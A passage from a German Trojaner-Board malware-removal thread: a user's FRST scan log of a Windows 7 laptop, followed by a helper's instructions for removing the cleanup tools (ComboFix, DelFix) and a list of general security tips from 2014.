HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.116\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-30 08:13 - 2014-04-30 08:13 - 00016302 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-30 08:13 - 2014-04-27 23:10 - 02061824 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-28 22:43 - 2014-04-28 22:43 - 00000439 _____ () C:\Users\Franz\Desktop\Fixlist.txt
2014-04-28 03:14 - 2014-04-28 03:14 - 00039936 _____ () C:\Users\Franz\Desktop\Kalender.xls
2014-04-23 00:27 - 2014-04-23 00:32 - 00000000 ____D () C:\Users\Franz\Desktop\Air Niugini
2014-04-22 04:48 - 2014-04-29 04:35 - 00000000 ____D () C:\Users\Franz\Desktop\Projekt
2014-04-22 02:40 - 2014-04-29 13:23 - 00000000 ____D () C:\Program Files (x86)\Smadav
2014-04-22 02:40 - 2014-04-22 02:40 - 00003240 _____ () C:\Windows\System32\Tasks\smadav
2014-04-22 02:40 - 2014-04-22 02:40 - 00000718 _____ () C:\Users\Public\Desktop\SMADΔV.lnk
2014-04-22 02:40 - 2014-04-22 02:40 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Smadav
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-23 18:40 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-14 10:43 - 2014-04-30 08:13 - 00000000 ____D () C:\FRST
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-28 23:27 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-28 23:33 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-29 04:39 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv

==================== One Month Modified Files and Folders =======

2014-04-30 08:13 - 2014-04-30 08:13 - 00016302 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-30 08:13 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-30 07:53 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-30 07:51 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-29 13:27 - 2013-04-16 19:13 - 01064251 _____ () C:\Windows\WindowsUpdate.log
2014-04-29 13:23 - 2014-04-22 02:40 - 00000000 ____D () C:\Program Files (x86)\Smadav
2014-04-29 13:22 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-29 13:15 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\PNG
2014-04-29 12:26 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-29 12:21 - 2009-07-14 06:51 - 00090024 _____ () C:\Windows\setupact.log
2014-04-29 08:48 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-29 04:39 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-29 04:37 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-29 04:37 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-29 04:37 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-29 04:35 - 2014-04-22 04:48 - 00000000 ____D () C:\Users\Franz\Desktop\Projekt
2014-04-28 23:33 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-28 23:27 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-28 22:58 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-28 22:58 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-28 22:50 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-28 22:43 - 2014-04-28 22:43 - 00000439 _____ () C:\Users\Franz\Desktop\Fixlist.txt
2014-04-28 13:21 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-04-28 03:14 - 2014-04-28 03:14 - 00039936 _____ () C:\Users\Franz\Desktop\Kalender.xls
2014-04-27 23:10 - 2014-04-30 08:13 - 02061824 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-25 06:39 - 2010-05-11 01:15 - 00116164 _____ () C:\Windows\PFRO.log
2014-04-23 18:40 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-23 18:16 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-23 18:00 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-04-23 00:32 - 2014-04-23 00:27 - 00000000 ____D () C:\Users\Franz\Desktop\Air Niugini
2014-04-22 02:40 - 2014-04-22 02:40 - 00003240 _____ () C:\Windows\System32\Tasks\smadav
2014-04-22 02:40 - 2014-04-22 02:40 - 00000718 _____ () C:\Users\Public\Desktop\SMADΔV.lnk
2014-04-22 02:40 - 2014-04-22 02:40 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Smadav
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================

--- --- ---

schrauber 01.05.2014 06:12

Deswegen ja auf eigene Gefahr. Immer besser ganz abzuchecken, man muss schauen von wo diese Stick-Infektion kommt, gibt mehrere Ursachen. Kannst aber gerne für jden nen Thread aufmachen :)



Fertig :)

Die Reihenfolge ist hier entscheidend.
  1. Falls Defogger benutzt wurde: Defogger nochmal starten und auf re-enable klicken.
  2. Falls Combofix benutzt wurde: (Alternativ in uninstall.exe umbenennen und starten)
    • Windowstaste + R > Combofix /Uninstall (eingeben) > OK
    • Alternative: Combofix.exe in uninstall.exe umbenennen und starten
    • Combofix wird jetzt starten, sich evtl updaten und dann alle Reste von sich selbst entfernen.
  3. Downloade Dir bitte auf jeden Fall DelFix Download DelFix auf deinen Desktop:
    • Schließe alle offenen Programme.
    • Starte die delfix.exe mit einem Doppelklick.
    • Setze vor jede Funktion ein Häkchen.
    • Klicke auf Start.
    • Hinweis: DelFix entfernt u. a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst.
    • Starte deinen Rechner abschließend neu.
  4. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein kannst du sie bedenkenlos löschen.



Falls Du Lob oder Kritik abgeben möchtest kannst Du das hier tun :)

Hier noch ein paar Tipps zur Absicherung deines Systems.


Ich kann garnicht zu oft erwähnen, wie wichtig es ist, dass dein System Up to Date ist.
  • Bitte überprüfe ob dein System Windows Updates automatisch herunter lädt
  • Windows Updates
    • Windows XP: Start --> Systemsteuerung --> Doppelklick auf Automatische Updates
    • Windows Vista / 7: Start --> Systemsteuerung --> System und Sicherheit --> Automatische Updates aktivieren oder deaktivieren
  • Gehe sicher das die automatischen Updates aktiviert sind.
  • Software Updates
    Installierte Software kann ebenfalls Sicherheitslücken haben, welche Malware nutzen kann, um dein System zu infizieren.
    Um deine Installierte Software up to date zu halten, empfehle ich dir Secunia Online Software.


Anti- Viren Software
  • Gehe sicher immer eine Anti Viren Software installiert zu haben und das diese auch up to date ist. Es ist nämlich nutzlos wenn diese out of date sind.


Zusätzlicher Schutz
  • MalwareBytes Anti Malware
    Dies ist eines der besten Anti-Malware Tools auf dem Markt. Es ist ein On- Demond Scan Tool welches viele aktuelle Malware erkennt und auch entfernt.
    Update das Tool und lass es einmal in der Woche laufen. Die Kaufversion biete zudem noch einen Hintergrundwächter.
    Ein Tutorial zur Verwendung findest Du hier.
  • WinPatrol
    Diese Software macht einen Snapshot deines Systems und warnt dich vor eventuellen Änderungen. Downloade dir die Freeware Version von hier.


Sicheres Browsen
  • SpywareBlaster
    Eine kurze Einführung findest du Hier
  • MVPs hosts file
    Ein Tutorial findest Du hier. Leider habe ich bis jetzt kein deutschsprachiges gefunden.
  • WOT (Web of trust)
    Dieses AddOn warnt Dich bevor Du eine als schädlich gemeldete Seite besuchst.


Alternative Browser

Andere Browser tendieren zu etwas mehr Sicherheit als der IE, da diese keine Active X Elemente verwenden. Diese können von Spyware zur Infektion deines Systems missbraucht werden.
  • Opera
  • Mozilla Firefox.
    • Hinweis: Für diesen Browser habe ich hier ein paar nützliche Add Ons
    • NoScript
      Dieses AddOn blockt JavaScript, Java and Flash und andere Plugins. Sie werden nur dann ausgeführt wenn Du es bestätigst.
    • AdblockPlus
      Dieses AddOn blockt die meisten Werbung von selbst. Ein Rechtsklick auf den Banner um diesen zu AdBlockPlus hinzu zu fügen reicht und dieser wird nicht mehr geladen.
      Es spart ausserdem Downloadkapazität.

Performance
Bereinige regelmäßig deine Temp Files. Ich empfehle hierzu TFC
Halte dich fern von jedlichen Registry Cleanern.
Diese Schaden deinem System mehr als sie helfen. Hier ein paar ( englishe ) Links
Miekemoes Blogspot ( MVP )
Bill Castner ( MVP )



Don'ts
  • Klicke nicht auf alles nur weil es Dich dazu auffordert und schön bunt ist.
  • verwende keine peer to peer oder Filesharing Software (Emule, uTorrent,..)
  • Lass die Finger von Cracks, Keygens, Serials oder anderer illegaler Software.
  • Öffne keine Anhänge von Dir nicht bekannten Emails. Achte vor allem auf die Dateiendung wie zb deinFoto.jpg.exe
Nun bleibt mir nur noch dir viel Spass beim sicheren Surfen zu wünschen.

Hinweis: Bitte gib mir eine kurze Rückmeldung wenn alles erledigt ist und keine Fragen mehr vorhanden sind, so das ich diesen Thread aus meinen Abos löschen kann.


Alle Zeitangaben in WEZ +1. Es ist jetzt 02:34 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131